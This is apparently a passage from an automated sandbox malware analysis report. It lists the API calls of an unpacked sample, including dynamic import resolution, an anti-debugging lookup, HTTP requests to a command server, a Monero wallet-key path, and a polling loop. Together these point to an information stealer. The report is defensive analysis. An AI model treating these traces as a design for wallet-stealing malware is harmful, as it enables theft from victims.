                                    • GetProcAddress.KERNEL32(76210000,00B688E0), ref: 000E99AD
                                    • GetProcAddress.KERNEL32(76210000,00B651A8), ref: 000E99C5
                                    • GetProcAddress.KERNEL32(76210000,00B68868), ref: 000E99DE
                                    • GetProcAddress.KERNEL32(76210000,00B68A90), ref: 000E99F6
                                    • GetProcAddress.KERNEL32(76210000,00B65308), ref: 000E9A0E
                                    • GetProcAddress.KERNEL32(76210000,00B68928), ref: 000E9A27
                                    • GetProcAddress.KERNEL32(76210000,00B68940), ref: 000E9A3F
                                    • GetProcAddress.KERNEL32(76210000,00B65208), ref: 000E9A57
                                    • GetProcAddress.KERNEL32(76210000,00B689B8), ref: 000E9A70
                                    • GetProcAddress.KERNEL32(76210000,00B650A8), ref: 000E9A88
                                    • LoadLibraryA.KERNEL32(00B688B0,?,000E6A00), ref: 000E9A9A
                                    • LoadLibraryA.KERNEL32(00B689D0,?,000E6A00), ref: 000E9AAB
                                    • LoadLibraryA.KERNEL32(00B688C8,?,000E6A00), ref: 000E9ABD
                                    • LoadLibraryA.KERNEL32(00B689E8,?,000E6A00), ref: 000E9ACF
                                    • LoadLibraryA.KERNEL32(00B68AA8,?,000E6A00), ref: 000E9AE0
                                    • GetProcAddress.KERNEL32(75B30000,00B68AC0), ref: 000E9B02
                                    • GetProcAddress.KERNEL32(751E0000,00B68AD8), ref: 000E9B23
                                    • GetProcAddress.KERNEL32(751E0000,00B68BF8), ref: 000E9B3B
                                    • GetProcAddress.KERNEL32(76910000,00B68BB0), ref: 000E9B5D
                                    • GetProcAddress.KERNEL32(75670000,00B65108), ref: 000E9B7E
                                    • GetProcAddress.KERNEL32(77310000,00B79208), ref: 000E9B9F
                                    • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 000E9BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 000E9BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 2e9aea6f92bab1216cb530423830ecaf2f7d420328039d375cde5b4954bd7c96
                                    • Instruction ID: 56ed66a7498a64a07befe17c292bc32dc3182107f77f97c765b3f5cd36f0319f
                                    • Opcode Fuzzy Hash: 2e9aea6f92bab1216cb530423830ecaf2f7d420328039d375cde5b4954bd7c96
                                    • Instruction Fuzzy Hash: DBA17CB5502A409FD346EFA8EE889E23BFDF74C313F04C51AA619832A5D7399542DB12

Control-flow graph for d45c0 (interactive in the original report):
• d45c0-d4695: RtlAllocateHeap
• d46a0-d46a6 -> d46ac-d474a -> d46a0: loop
• d474f-d47a9: VirtualProtect, reached when the loop at d46a0 exits
• the filler sentence listed under Strings is referenced from all three blocks
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000D460E
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 000D479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 000D45C7, 000D45D2, 000D45DD, 000D45E8, 000D45F3, 000D4617, 000D4622, 000D462D, 000D4638, 000D4643, 000D4657, 000D4662, 000D466D, 000D4678, 000D4683, 000D46AC, 000D46B7, 000D46C2, 000D46CD, 000D46D8, 000D4713, 000D471E, 000D4729, 000D4734, 000D473F, 000D474F, 000D475A, 000D4765, 000D4770, 000D477B (the same sentence at every one of the 30 xrefs)
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this one sentence repeated, '$'-separated, once per xref listed under Strings above)
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 7f1da86fba17dd4e7e22c8509c94319f33974591378f89fbe486dcb23143f840
                                    • Instruction ID: 6b663c3d68ab8e9476a1e17898f5df04bd8d02d145396f51828bc780a7e21fbd
                                    • Opcode Fuzzy Hash: 7f1da86fba17dd4e7e22c8509c94319f33974591378f89fbe486dcb23143f840
                                    • Instruction Fuzzy Hash: DB4146216CA70C7AE638BBB58C46EBF77535F4BB49F52D040EB005AE90CBB07580752A

Control-flow graph for d4880 (interactive in the original report; the string-helper subcalls ea740, ea800, ea8a0, ea920 and ea9b0 are elided):
• d4880-d4942: call ea7a0, d47b0 (the InternetCrackUrlA subcall listed below), ea740 x5; InternetOpenA; StrCmpCA
• d4944 / d494b-d494f: branch; d4955-d4acd: string assembly (e8b60 and helpers), InternetConnectA
• d4ad3-d4ae5: branch; d4aef-d4b22: HttpOpenRequestA
• d4b28-d4e28: string assembly for the request (the `"` and `------` strings of this function, consistent with a multipart body), lstrlen x2, HttpSendRequestA
• d4e32-d4e5c: InternetReadFile; d4e69-d4ea7 loops back to d4e32 (read loop); d4e5e-d4e65 / d4e67-d4eb9: exit path, InternetCloseHandle
• d4ebe-d4ec5: InternetCloseHandle; d4ecb-d4ef3: InternetCloseHandle, call eaad0, d9ac0
• d4ef5-d4f2d / d4f32-d4fa2: cleanup (e8990 x2, ea7a0, ea800 x8)
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000D4915
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D4ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000F0DDB,00000000,?,?,00000000,?,",00000000,?,00B81338), ref: 000D4DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 000D4E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 000D4E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D4E49
                                    • InternetCloseHandle.WININET(00000000), ref: 000D4EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 000D4EC5
                                    • HttpOpenRequestA.WININET(00000000,00B812A8,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D4B15
                                      • Part of subcall function 000EA9B0: lstrlen.KERNEL32(?,00B79048,?,\Monero\wallet.keys,000F0E17), ref: 000EA9C5
                                      • Part of subcall function 000EA9B0: lstrcpy.KERNEL32(00000000), ref: 000EAA04
                                      • Part of subcall function 000EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAA12
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000EA920: lstrcpy.KERNEL32(00000000,?), ref: 000EA972
                                      • Part of subcall function 000EA920: lstrcat.KERNEL32(00000000), ref: 000EA982
                                    • InternetCloseHandle.WININET(00000000), ref: 000D4ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: f09ade9123553e0435cc15e5698a6ab544130ebf64d6b8954d1ab81592f218ee
                                    • Instruction ID: 9926ce01cea06dbe36170a81bd49348bb54aa4bbd10d0041f36f5035b8f69ad3
                                    • Opcode Fuzzy Hash: f09ade9123553e0435cc15e5698a6ab544130ebf64d6b8954d1ab81592f218ee
                                    • Instruction Fuzzy Hash: 51120B71A10258AEDB15EB91DD92FEEB379AF1A300F514199B10672092EF703F49CF62
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000D11B7), ref: 000E7880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000E7887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 000E789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    • Associated: 00000000.00000002.2208176160.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000018D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.00000000001B2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208197213.000000000031A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000032E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0

                                    Control-flow Graph (rendered graphic on the original page; basic-block layout not reproduced in text)
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00B65008), ref: 000E9C2D
                                    • GetProcAddress.KERNEL32(76210000,00B65148), ref: 000E9C45
                                    • GetProcAddress.KERNEL32(76210000,00B79538), ref: 000E9C5E
                                    • GetProcAddress.KERNEL32(76210000,00B79790), ref: 000E9C76
                                    • GetProcAddress.KERNEL32(76210000,00B796E8), ref: 000E9C8E
                                    • GetProcAddress.KERNEL32(76210000,00B79610), ref: 000E9CA7
                                    • GetProcAddress.KERNEL32(76210000,00B6AD60), ref: 000E9CBF
                                    • GetProcAddress.KERNEL32(76210000,00B796B8), ref: 000E9CD7
                                    • GetProcAddress.KERNEL32(76210000,00B794D8), ref: 000E9CF0
                                    • GetProcAddress.KERNEL32(76210000,00B79700), ref: 000E9D08
                                    • GetProcAddress.KERNEL32(76210000,00B79550), ref: 000E9D20
                                    • GetProcAddress.KERNEL32(76210000,00B65328), ref: 000E9D39
                                    • GetProcAddress.KERNEL32(76210000,00B65188), ref: 000E9D51
                                    • GetProcAddress.KERNEL32(76210000,00B650E8), ref: 000E9D69
                                    • GetProcAddress.KERNEL32(76210000,00B65128), ref: 000E9D82
                                    • GetProcAddress.KERNEL32(76210000,00B79640), ref: 000E9D9A
                                    • GetProcAddress.KERNEL32(76210000,00B79568), ref: 000E9DB2
                                    • GetProcAddress.KERNEL32(76210000,00B6B0A8), ref: 000E9DCB
                                    • GetProcAddress.KERNEL32(76210000,00B65168), ref: 000E9DE3
                                    • GetProcAddress.KERNEL32(76210000,00B79580), ref: 000E9DFB
                                    • GetProcAddress.KERNEL32(76210000,00B795B0), ref: 000E9E14
                                    • GetProcAddress.KERNEL32(76210000,00B797A8), ref: 000E9E2C
                                    • GetProcAddress.KERNEL32(76210000,00B79730), ref: 000E9E44
                                    • GetProcAddress.KERNEL32(76210000,00B65228), ref: 000E9E5D
                                    • GetProcAddress.KERNEL32(76210000,00B795F8), ref: 000E9E75
                                    • GetProcAddress.KERNEL32(76210000,00B79628), ref: 000E9E8D
                                    • GetProcAddress.KERNEL32(76210000,00B79718), ref: 000E9EA6
                                    • GetProcAddress.KERNEL32(76210000,00B79760), ref: 000E9EBE
                                    • GetProcAddress.KERNEL32(76210000,00B79658), ref: 000E9ED6
                                    • GetProcAddress.KERNEL32(76210000,00B79778), ref: 000E9EEF
                                    • GetProcAddress.KERNEL32(76210000,00B794F0), ref: 000E9F07
                                    • GetProcAddress.KERNEL32(76210000,00B79670), ref: 000E9F1F
                                    • GetProcAddress.KERNEL32(76210000,00B79688), ref: 000E9F38
                                    • GetProcAddress.KERNEL32(76210000,00B705F8), ref: 000E9F50
                                    • GetProcAddress.KERNEL32(76210000,00B79508), ref: 000E9F68
                                    • GetProcAddress.KERNEL32(76210000,00B79520), ref: 000E9F81
                                    • GetProcAddress.KERNEL32(76210000,00B65268), ref: 000E9F99
                                    • GetProcAddress.KERNEL32(76210000,00B7F4A8), ref: 000E9FB1
                                    • GetProcAddress.KERNEL32(76210000,00B65288), ref: 000E9FCA
                                    • GetProcAddress.KERNEL32(76210000,00B7F4C0), ref: 000E9FE2
                                    • GetProcAddress.KERNEL32(76210000,00B7F550), ref: 000E9FFA
                                    • GetProcAddress.KERNEL32(76210000,00B64FE8), ref: 000EA013
                                    • GetProcAddress.KERNEL32(76210000,00B65028), ref: 000EA02B
                                    • LoadLibraryA.KERNEL32(00B7F2C8,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA03D
                                    • LoadLibraryA.KERNEL32(00B7F4F0,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA04E
                                    • LoadLibraryA.KERNEL32(00B7F568,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA060
                                    • LoadLibraryA.KERNEL32(00B7F388,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA072
                                    • LoadLibraryA.KERNEL32(00B7F340,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA083
                                    • LoadLibraryA.KERNEL32(00B7F4D8,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA095
                                    • LoadLibraryA.KERNEL32(00B7F370,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA0A7
                                    • LoadLibraryA.KERNEL32(00B7F3A0,?,000E5CA3,000F0AEB,?,?,?,?,?,?,?,?,?,?,000F0AEA,000F0AE3), ref: 000EA0B8
                                    • GetProcAddress.KERNEL32(751E0000,00B65048), ref: 000EA0DA
                                    • GetProcAddress.KERNEL32(751E0000,00B7F3D0), ref: 000EA0F2
                                    • GetProcAddress.KERNEL32(751E0000,00B791E8), ref: 000EA10A
                                    • GetProcAddress.KERNEL32(751E0000,00B7F418), ref: 000EA123
                                    • GetProcAddress.KERNEL32(751E0000,00B65088), ref: 000EA13B
                                    • GetProcAddress.KERNEL32(700F0000,00B6AF18), ref: 000EA160
                                    • GetProcAddress.KERNEL32(700F0000,00B653A8), ref: 000EA179
                                    • GetProcAddress.KERNEL32(700F0000,00B6B1E8), ref: 000EA191
                                    • GetProcAddress.KERNEL32(700F0000,00B7F478), ref: 000EA1A9
                                    • GetProcAddress.KERNEL32(700F0000,00B7F3E8), ref: 000EA1C2
                                    • GetProcAddress.KERNEL32(700F0000,00B65488), ref: 000EA1DA
                                    • GetProcAddress.KERNEL32(700F0000,00B653C8), ref: 000EA1F2
                                    • GetProcAddress.KERNEL32(700F0000,00B7F358), ref: 000EA20B
                                    • GetProcAddress.KERNEL32(753A0000,00B65608), ref: 000EA22C
                                    • GetProcAddress.KERNEL32(753A0000,00B65628), ref: 000EA244
                                    • GetProcAddress.KERNEL32(753A0000,00B7F328), ref: 000EA25D
                                    • GetProcAddress.KERNEL32(753A0000,00B7F508), ref: 000EA275
                                    • GetProcAddress.KERNEL32(753A0000,00B653E8), ref: 000EA28D
                                    • GetProcAddress.KERNEL32(76310000,00B6AD88), ref: 000EA2B3
                                    • GetProcAddress.KERNEL32(76310000,00B6AF40), ref: 000EA2CB
                                    • GetProcAddress.KERNEL32(76310000,00B7F3B8), ref: 000EA2E3
                                    • GetProcAddress.KERNEL32(76310000,00B656C8), ref: 000EA2FC
                                    • GetProcAddress.KERNEL32(76310000,00B65448), ref: 000EA314
                                    • GetProcAddress.KERNEL32(76310000,00B6AF90), ref: 000EA32C
                                    • GetProcAddress.KERNEL32(76910000,00B7F2E0), ref: 000EA352
                                    • GetProcAddress.KERNEL32(76910000,00B656E8), ref: 000EA36A
                                    • GetProcAddress.KERNEL32(76910000,00B79288), ref: 000EA382
                                    • GetProcAddress.KERNEL32(76910000,00B7F400), ref: 000EA39B
                                    • GetProcAddress.KERNEL32(76910000,00B7F430), ref: 000EA3B3
                                    • GetProcAddress.KERNEL32(76910000,00B655C8), ref: 000EA3CB
                                    • GetProcAddress.KERNEL32(76910000,00B65648), ref: 000EA3E4
                                    • GetProcAddress.KERNEL32(76910000,00B7F448), ref: 000EA3FC
                                    • GetProcAddress.KERNEL32(76910000,00B7F538), ref: 000EA414
                                    • GetProcAddress.KERNEL32(75B30000,00B654A8), ref: 000EA436
                                    • GetProcAddress.KERNEL32(75B30000,00B7F460), ref: 000EA44E
                                    • GetProcAddress.KERNEL32(75B30000,00B7F298), ref: 000EA466
                                    • GetProcAddress.KERNEL32(75B30000,00B7F490), ref: 000EA47F
                                    • GetProcAddress.KERNEL32(75B30000,00B7F520), ref: 000EA497
                                    • GetProcAddress.KERNEL32(75670000,00B65688), ref: 000EA4B8
                                    • GetProcAddress.KERNEL32(75670000,00B655E8), ref: 000EA4D1
                                    • GetProcAddress.KERNEL32(76AC0000,00B65668), ref: 000EA4F2
                                    • GetProcAddress.KERNEL32(76AC0000,00B7F580), ref: 000EA50A
                                    • GetProcAddress.KERNEL32(6F4E0000,00B654C8), ref: 000EA530
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65348), ref: 000EA548
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65368), ref: 000EA560
                                    • GetProcAddress.KERNEL32(6F4E0000,00B7F2B0), ref: 000EA579
                                    • GetProcAddress.KERNEL32(6F4E0000,00B654E8), ref: 000EA591
                                    • GetProcAddress.KERNEL32(6F4E0000,00B656A8), ref: 000EA5A9
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65388), ref: 000EA5C2
                                    • GetProcAddress.KERNEL32(6F4E0000,00B65508), ref: 000EA5DA
                                    • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 000EA5F1
                                    • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 000EA607
                                    • GetProcAddress.KERNEL32(75AE0000,00B7F2F8), ref: 000EA629
                                    • GetProcAddress.KERNEL32(75AE0000,00B792F8), ref: 000EA641
                                    • GetProcAddress.KERNEL32(75AE0000,00B7F310), ref: 000EA659
                                    • GetProcAddress.KERNEL32(75AE0000,00B7F670), ref: 000EA672
                                    • GetProcAddress.KERNEL32(76300000,00B65408), ref: 000EA693
                                    • GetProcAddress.KERNEL32(6FE40000,00B7F688), ref: 000EA6B4
                                    • GetProcAddress.KERNEL32(6FE40000,00B65528), ref: 000EA6CD
                                    • GetProcAddress.KERNEL32(6FE40000,00B7F6A0), ref: 000EA6E5
                                    • GetProcAddress.KERNEL32(6FE40000,00B7F5F8), ref: 000EA6FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166

                                    Control-flow Graph (rendered graphic on the original page; basic-block layout not reproduced in text)
                                    APIs
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4839
                                      • Part of subcall function 000D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4849
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • InternetOpenA.WININET(000F0DFE,00000001,00000000,00000000,00000000), ref: 000D62E1
                                    • StrCmpCA.SHLWAPI(?,00B81328), ref: 000D6303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00B80BD0,00000000,00000000,00400100,00000000), ref: 000D6385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D63BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D63D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000D63FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000D646D
                                    • InternetCloseHandle.WININET(00000000), ref: 000D64EF
                                    • InternetCloseHandle.WININET(00000000), ref: 000D64F9
                                    • InternetCloseHandle.WININET(00000000), ref: 000D6503
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195

                                    Control-flow Graph (rendered graphic on the original page; basic-block layout not reproduced in text)
                                    APIs
                                      • Part of subcall function 000EA820: lstrlen.KERNEL32(000D4F05,?,?,000D4F05,000F0DDE), ref: 000EA82B
                                      • Part of subcall function 000EA820: lstrcpy.KERNEL32(000F0DDE,00000000), ref: 000EA885
                                      • Part of subcall function 000EA740: lstrcpy.KERNEL32(000F0E17,00000000), ref: 000EA788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E56A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5857
                                      • Part of subcall function 000EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000EA7E6
                                      • Part of subcall function 000E51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5228
                                      • Part of subcall function 000EA8A0: lstrcpy.KERNEL32(?,000F0E17), ref: 000EA905
                                      • Part of subcall function 000E52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5318
                                      • Part of subcall function 000E52C0: lstrlen.KERNEL32(00000000), ref: 000E532F
                                      • Part of subcall function 000E52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 000E5364
                                      • Part of subcall function 000E52C0: lstrlen.KERNEL32(00000000), ref: 000E5383
                                      • Part of subcall function 000E52C0: lstrlen.KERNEL32(00000000), ref: 000E53AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000E5A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 000E5A1B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 6ec3ac3421a270cc7db847e2c215caee6f723df48a7930bf2c4ecd97b7047a13
                                    • Instruction ID: 2776fbe1a6e692727007fd5e9d9b9d40356a818bf1b1ab6bf8760286026bc806
                                    • Opcode Fuzzy Hash: 6ec3ac3421a270cc7db847e2c215caee6f723df48a7930bf2c4ecd97b7047a13
                                    • Instruction Fuzzy Hash: F3E19171A10544AEDB04FBA1DD92AFD733DAF59301F408528B50676193EF347A09CBA2

                                     Control-flow Graph

                                     • Executed
                                     • Not Executed
